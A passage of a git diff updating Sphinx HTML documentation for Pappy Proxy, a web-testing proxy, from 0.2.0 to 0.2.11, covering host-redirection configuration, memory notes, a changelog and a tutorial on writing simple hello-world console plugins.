{&quot;port&quot;: 8443, &quot;interface&quot;: &quot;127.0.0.1&quot;, &quot;forward_host_ssl&quot;: &quot;www.example.faketld&quot;},
]
</pre></div>
</div>
<p>This configuration will cause Pappy to open a port on 8080 that will
accept connections normally and a port on 8443 which will accept SSL
connections. The forward_host setting tells Pappy to redirect any
requests sent to the port to the given host. It will also update the
requests host header. forward_host_ssl does the same thing, but it
listens for SSL connections and forces the connection to use SSL.</p>
<p>Or if youre going to YOLO it do the same thing then listen on port
80/443 directly. I do not suggest you do this.</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>&quot;proxy_listeners&quot;: [
{&quot;port&quot;: 80, &quot;interface&quot;: &quot;127.0.0.1&quot;, &quot;forward_host&quot;: &quot;www.example.faketld&quot;},
{&quot;port&quot;: 443, &quot;interface&quot;: &quot;127.0.0.1&quot;, &quot;forward_host_ssl&quot;: &quot;www.example.faketld&quot;},
]
</pre></div>
</div>
<p>Pappy will automatically use this host to make the connection and
forward the request to the new server.</p>
</div>
<div class="section" id="faq">
<h2>FAQ<a class="headerlink" href="#faq" title="Permalink to this headline"></a></h2>
<div class="section" id="i-still-like-burp-but-pappy-looks-interesting-can-i-use-both">
@ -1654,10 +2086,83 @@ it&#8217;s saved to disk, it will have an ID of <code class="docutils literal"><
bit and it will get an ID you can use.</p>
</div>
</div>
<div class="section" id="boring-technical-stuff">
<h2>Boring, Technical Stuff<a class="headerlink" href="#boring-technical-stuff" title="Permalink to this headline"></a></h2>
<p>I do some stuff to try and keep speed and memory usage to reasonable
levels. Unfortunately, things might seem slow in some areas. This is
where I try and explain why those exist. Honestly, you probably don&#8217;t
care about this, but I&#8217;d rather have it written down and have nobody
read it than just leave people in the dark.</p>
<div class="section" id="request-cache-memory-usage">
<h3>Request Cache / Memory usage<a class="headerlink" href="#request-cache-memory-usage" title="Permalink to this headline"></a></h3>
<p>For performance reasons, Pappy by default will not store every request
in memory. The cache will store a certain number of the most recently
accessed requests in memory. This means that if you go through all of
history, it could be slow (for example running <code class="docutils literal"><span class="pre">ls</span> <span class="pre">a</span></code> or <code class="docutils literal"><span class="pre">sm</span></code>). If
you have enough RAM to keep everything in memory, you can set the
request cache size to -1 to just keep everything in memory. However,
even if the cache size is unlimited, it still won&#8217;t load a request into
memory untill you access it. So if you want to load everything in
memory, run <code class="docutils literal"><span class="pre">ls</span> <span class="pre">a</span></code>.</p>
<p>By default, Pappy will cache 2000 requests. This is kind of heavy, but
it&#8217;s assumed you&#8217;re doing testing on a reasonably specced laptop.
Personally, I live on the edge and use -1 until I run into memory
issues.</p>
</div>
</div>
<div class="section" id="changelog">
<h2>Changelog<a class="headerlink" href="#changelog" title="Permalink to this headline"></a></h2>
<p>The boring part of the readme</p>
<ul class="simple">
<li>0.2.7<ul>
<li>boring unit tests</li>
<li>should make future releases more stable I guess</li>
<li>Support for upstream SOCKS servers</li>
<li><code class="docutils literal"><span class="pre">print_params</span></code> command</li>
<li><code class="docutils literal"><span class="pre">inv</span></code> filter</li>
<li><code class="docutils literal"><span class="pre">param_info</span></code> command</li>
<li>Filters by request/response only headers/body</li>
<li>Transparent host redirection</li>
<li>Some easier to type aliases for common commands</li>
</ul>
</li>
<li>0.2.6<ul>
<li>Fix pip being dumb</li>
<li><code class="docutils literal"><span class="pre">watch</span></code> command to watch requests/responses in real time</li>
<li>Added <code class="docutils literal"><span class="pre">pp[qs]</span> <span class="pre">form</span> <span class="pre">&lt;id&gt;</span></code> to print POST data</li>
<li>Bugfixes</li>
</ul>
</li>
<li>0.2.5<ul>
<li>Requests sent with repeater now are given <code class="docutils literal"><span class="pre">repeater</span></code> tag</li>
<li>Add ppq and pps commands</li>
<li>Look at the pretty prompt</li>
<li>Bugfixes</li>
</ul>
</li>
<li>0.2.4<ul>
<li>Add command history saving between sessions</li>
<li>Add html encoder/decoder</li>
<li>All the bugs were fixed so I added some more for 0.2.5</li>
</ul>
</li>
<li>0.2.3<ul>
<li>Decoder functions</li>
<li>Add <code class="docutils literal"><span class="pre">merge</span></code> command</li>
<li>Bugfixes</li>
</ul>
</li>
<li>0.2.2<ul>
<li>COLORS</li>
<li>Performance improvements</li>
<li>Bugfixes (duh)</li>
</ul>
</li>
<li>0.2.1<ul>
<li>Improve memory usage</li>
<li>Tweaked plugin API</li>
</ul>
</li>
<li>0.2.0<ul>
<li>Lots of refactoring</li>
<li>Plugins</li>
@ -1702,6 +2207,12 @@ always be pappy time in your heart, I promise)</li>
</ul>
</li>
<li><a class="reference internal" href="#configuration">Configuration</a></li>
<li><a class="reference internal" href="#general-console-techniques">General Console Techniques</a><ul>
<li><a class="reference internal" href="#run-a-shell-command">Run a shell command</a></li>
<li><a class="reference internal" href="#running-python-code">Running Python Code</a></li>
<li><a class="reference internal" href="#redirect-output-to-file">Redirect Output To File</a></li>
</ul>
</li>
<li><a class="reference internal" href="#generating-pappy-s-ca-cert">Generating Pappy&#8217;s CA Cert</a></li>
<li><a class="reference internal" href="#browsing-recorded-requests-responses">Browsing Recorded Requests/Responses</a></li>
<li><a class="reference internal" href="#tags">Tags</a></li>
@ -1720,6 +2231,7 @@ always be pappy time in your heart, I promise)</li>
<li><a class="reference internal" href="#built-in-filters">Built-In Filters</a></li>
</ul>
</li>
<li><a class="reference internal" href="#decoding-strings">Decoding Strings</a></li>
<li><a class="reference internal" href="#interceptor">Interceptor</a></li>
<li><a class="reference internal" href="#repeater">Repeater</a></li>
<li><a class="reference internal" href="#macros">Macros</a><ul>
@ -1741,11 +2253,18 @@ always be pappy time in your heart, I promise)</li>
<li><a class="reference internal" href="#should-i-write-a-plugin-or-a-macro">Should I Write a Plugin or a Macro?</a></li>
</ul>
</li>
<li><a class="reference internal" href="#global-settings">Global Settings</a></li>
<li><a class="reference internal" href="#using-a-socks-server">Using a SOCKS Server</a></li>
<li><a class="reference internal" href="#transparent-host-redirection">Transparent Host Redirection</a></li>
<li><a class="reference internal" href="#faq">FAQ</a><ul>
<li><a class="reference internal" href="#i-still-like-burp-but-pappy-looks-interesting-can-i-use-both">I still like Burp, but Pappy looks interesting, can I use both?</a></li>
<li><a class="reference internal" href="#why-does-my-request-have-an-id-of">Why does my request have an id of <code class="docutils literal"><span class="pre">--</span></code>?!?!</a></li>
</ul>
</li>
<li><a class="reference internal" href="#boring-technical-stuff">Boring, Technical Stuff</a><ul>
<li><a class="reference internal" href="#request-cache-memory-usage">Request Cache / Memory usage</a></li>
</ul>
</li>
<li><a class="reference internal" href="#changelog">Changelog</a></li>
</ul>
</li>
@ -1796,12 +2315,12 @@ always be pappy time in your heart, I promise)</li>
<li class="right" >
<a href="index.html" title="Welcome to Pappy Proxys documentation!"
>previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.3.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

197
docs/build/html/pappyplugins.html vendored
View file

@ -6,7 +6,7 @@
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Writing Plugins for the Pappy Proxy &mdash; Pappy Proxy 0.2.0 documentation</title>
<title>Writing Plugins for the Pappy Proxy &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
@ -14,7 +14,7 @@
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.0',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
@ -23,7 +23,8 @@
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.0 documentation" href="index.html" />
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<link rel="next" title="Contributing" href="contributing.html" />
<link rel="prev" title="The Pappy Proxy Tutorial" href="tutorial.html" />
</head>
<body role="document">
@ -36,10 +37,13 @@
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="contributing.html" title="Contributing"
accesskey="N">next</a> |</li>
<li class="right" >
<a href="tutorial.html" title="The Pappy Proxy Tutorial"
accesskey="P">previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.0 documentation</a> &raquo;</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
@ -113,25 +117,25 @@
<div class="section" id="writing-a-hello-world-plugin">
<h3><a class="toc-backref" href="#id5">Writing a Hello World Plugin</a><a class="headerlink" href="#writing-a-hello-world-plugin" title="Permalink to this headline"></a></h3>
<p>It&#8217;s probably easiest to explain how to write a plugin by writing one. Here is a simple plugin that defines a <code class="docutils literal"><span class="pre">hello</span></code> command and gives an alias <code class="docutils literal"><span class="pre">hlo</span></code> (we&#8217;ll go over all the parts in a second):</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## hello.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Save this as <code class="docutils literal"><span class="pre">~/.pappy/plugins/hello.py</span></code> and run Pappy. You should have a new <code class="docutils literal"><span class="pre">hello</span></code> command that prints your message:</p>
<div class="highlight-python"><div class="highlight"><pre>$ cp hello.py ~/.pappy/plugins/
<div class="highlight-python"><div class="highlight"><pre><span></span>$ cp hello.py ~/.pappy/plugins/
$ pappy -l
Temporary datafile is /tmp/tmp1Myw6q
Proxy is listening on port 8000
@ -154,30 +158,30 @@ pappy&gt;
<div class="section" id="passing-arguments-to-your-function">
<h3><a class="toc-backref" href="#id6">Passing Arguments to Your Function</a><a class="headerlink" href="#passing-arguments-to-your-function" title="Permalink to this headline"></a></h3>
<p>Each command gets bound to one function which takes one argument. That argument is all the text that was entered after the name of the command in the console. For example if we run <code class="docutils literal"><span class="pre">hello</span> <span class="pre">foo</span> <span class="pre">bar</span></code>, in our function line would be &#8220;foo bar&#8221;. <strong>I suggest using shlex.split(line) to parse multiple arguments</strong>. So let&#8217;s update our script to take some arguments:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## hello.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;Hello, </span><span class="si">%s</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Save your changes and restart pappy to reload the plugin:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy&gt; hello
@ -193,26 +197,26 @@ pappy&gt;
<div class="section" id="adding-more-aliases">
<h3><a class="toc-backref" href="#id7">Adding More Aliases</a><a class="headerlink" href="#adding-more-aliases" title="Permalink to this headline"></a></h3>
<p>So now let&#8217;s add some more aliases to our command. If we want to add a new alias, we just add another tuple to the list passed into <code class="docutils literal"><span class="pre">cmd.add_aliases</span></code>. The first element is the real name of the command (what you set with <code class="docutils literal"><span class="pre">set_cmds</span></code>) and the second value is the alias you want to type. So let&#8217;s make it so we can just type <code class="docutils literal"><span class="pre">ho</span></code> to say hello:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="c">## hello.py</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;Hello, </span><span class="si">%s</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;ho&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;ho&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
@ -221,7 +225,7 @@ pappy&gt;
<p class="last">You must use the actual name of the command that you used in <code class="docutils literal"><span class="pre">set_cmds</span></code>. You can&#8217;t &#8220;chain&#8221; alieases. As a result, in our example we couldn&#8217;t add the alias <code class="docutils literal"><span class="pre">('hlo',</span> <span class="pre">'ho')</span></code> to add <code class="docutils literal"><span class="pre">ho</span></code> as our alias.</p>
</div>
<p>Then reload the plugin:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy&gt; ho
@ -237,7 +241,7 @@ pappy&gt;
<div class="section" id="adding-another-command">
<h3><a class="toc-backref" href="#id8">Adding Another Command</a><a class="headerlink" href="#adding-another-command" title="Permalink to this headline"></a></h3>
<p>So now let&#8217;s add a <code class="docutils literal"><span class="pre">robe_and_wizard_hat</span></code> command. To do this, we will define another function, then add another entry in the dict that is passed to <code class="docutils literal"><span class="pre">set_cmds</span></code>. The second value in the tuple is the autocomplete function, but we&#8217;ll get to that later. For now, just put in <code class="docutils literal"><span class="pre">None</span></code> to say we don&#8217;t have one. We will also add a <code class="docutils literal"><span class="pre">wh</span></code> alias to it:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpyl2cEZ
Proxy is listening on port 8000
pappy&gt; wh
@ -252,42 +256,42 @@ pappy&gt;
<blockquote>
<div><code class="docutils literal"><span class="pre">text</span></code> is the string prefix we are attempting to match: all returned matches must begin with it. <code class="docutils literal"><span class="pre">line</span></code> is the current input line with leading whitespace removed, <code class="docutils literal"><span class="pre">begidx</span></code> and <code class="docutils literal"><span class="pre">endidx</span></code> are the beginning and ending indexes of the prefix text, which could be used to provide different completion depending upon which position the argument is in.</div></blockquote>
<p>Let&#8217;s let the user to autocomplete some names in our plugin:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">shlex</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s">&#39;alice&#39;</span><span class="p">,</span> <span class="s">&#39;allie&#39;</span><span class="p">,</span> <span class="s">&#39;sarah&#39;</span><span class="p">,</span> <span class="s">&#39;mallory&#39;</span><span class="p">,</span> <span class="s">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;alice&#39;</span><span class="p">,</span> <span class="s1">&#39;allie&#39;</span><span class="p">,</span> <span class="s1">&#39;sarah&#39;</span><span class="p">,</span> <span class="s1">&#39;mallory&#39;</span><span class="p">,</span> <span class="s1">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;Hello, </span><span class="si">%s</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="k">def</span> <span class="nf">put_on_rope_and_wizard_hat</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;</span><span class="si">%s</span><span class="s"> puts on their robe and wizard hat&#39;</span> <span class="o">%</span> <span class="n">line</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> puts on their robe and wizard hat&#39;</span> <span class="o">%</span> <span class="n">line</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;I put on my robe and wizard hat&#39;</span>
<span class="k">print</span> <span class="s1">&#39;I put on my robe and wizard hat&#39;</span>
<span class="k">def</span> <span class="nf">complete_hello_world</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">begidx</span><span class="p">,</span> <span class="n">endidx</span><span class="p">):</span>
<span class="k">return</span> <span class="p">[</span><span class="n">n</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">_AUTOCOMPLETE_NAMES</span> <span class="k">if</span> <span class="n">n</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="n">text</span><span class="p">)]</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s">&#39;wizard_hat&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">put_on_rope_and_wizard_hat</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s1">&#39;wizard_hat&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">put_on_rope_and_wizard_hat</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s">&#39;wizard_hat&#39;</span><span class="p">,</span> <span class="s">&#39;wh&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;wizard_hat&#39;</span><span class="p">,</span> <span class="s1">&#39;wh&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Then restart and run:</p>
<div class="highlight-python"><div class="highlight"><pre>$ pappy -l
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmp3J97rE
Proxy is listening on port 8000
pappy&gt; hello
@ -302,9 +306,9 @@ pappy&gt;
<div class="section" id="adding-help">
<h3><a class="toc-backref" href="#id10">Adding Help</a><a class="headerlink" href="#adding-help" title="Permalink to this headline"></a></h3>
<p>Now let&#8217;s say we want to add some help to the command so that when the user runs <code class="docutils literal"><span class="pre">help</span> <span class="pre">hello</span></code> they get something useful. To do that, just add a docstring to your function:</p>
<div class="highlight-python"><div class="highlight"><pre><span class="kn">import</span> <span class="nn">shlex</span>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="kn">import</span> <span class="nn">shlex</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s">&#39;alice&#39;</span><span class="p">,</span> <span class="s">&#39;allie&#39;</span><span class="p">,</span> <span class="s">&#39;sarah&#39;</span><span class="p">,</span> <span class="s">&#39;mallory&#39;</span><span class="p">,</span> <span class="s">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="n">_AUTOCOMPLETE_NAMES</span> <span class="o">=</span> <span class="p">[</span><span class="s1">&#39;alice&#39;</span><span class="p">,</span> <span class="s1">&#39;allie&#39;</span><span class="p">,</span> <span class="s1">&#39;sarah&#39;</span><span class="p">,</span> <span class="s1">&#39;mallory&#39;</span><span class="p">,</span> <span class="s1">&#39;slagathor&#39;</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="sd">&quot;&quot;&quot;</span>
@ -313,30 +317,30 @@ pappy&gt;
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s">&#39;Hello, </span><span class="si">%s</span><span class="s">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&quot;Hello, world!&quot;</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="k">def</span> <span class="nf">put_on_rope_and_wizard_hat</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;</span><span class="si">%s</span><span class="s"> puts on their robe and wizard hat&#39;</span> <span class="o">%</span> <span class="n">line</span>
<span class="k">print</span> <span class="s1">&#39;</span><span class="si">%s</span><span class="s1"> puts on their robe and wizard hat&#39;</span> <span class="o">%</span> <span class="n">line</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">&#39;I put on my robe and wizard hat&#39;</span>
<span class="k">print</span> <span class="s1">&#39;I put on my robe and wizard hat&#39;</span>
<span class="k">def</span> <span class="nf">complete_hello_world</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">line</span><span class="p">,</span> <span class="n">begidx</span><span class="p">,</span> <span class="n">endidx</span><span class="p">):</span>
<span class="k">return</span> <span class="p">[</span><span class="n">n</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">_AUTOCOMPLETE_NAMES</span> <span class="k">if</span> <span class="n">n</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="n">text</span><span class="p">)]</span>
<span class="c">###############</span>
<span class="c">## Plugin hooks</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s">&#39;wizard_hat&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">put_on_rope_and_wizard_hat</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="n">complete_hello_world</span><span class="p">),</span>
<span class="s1">&#39;wizard_hat&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">put_on_rope_and_wizard_hat</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s">&#39;hello&#39;</span><span class="p">,</span> <span class="s">&#39;hlo&#39;</span><span class="p">),</span>
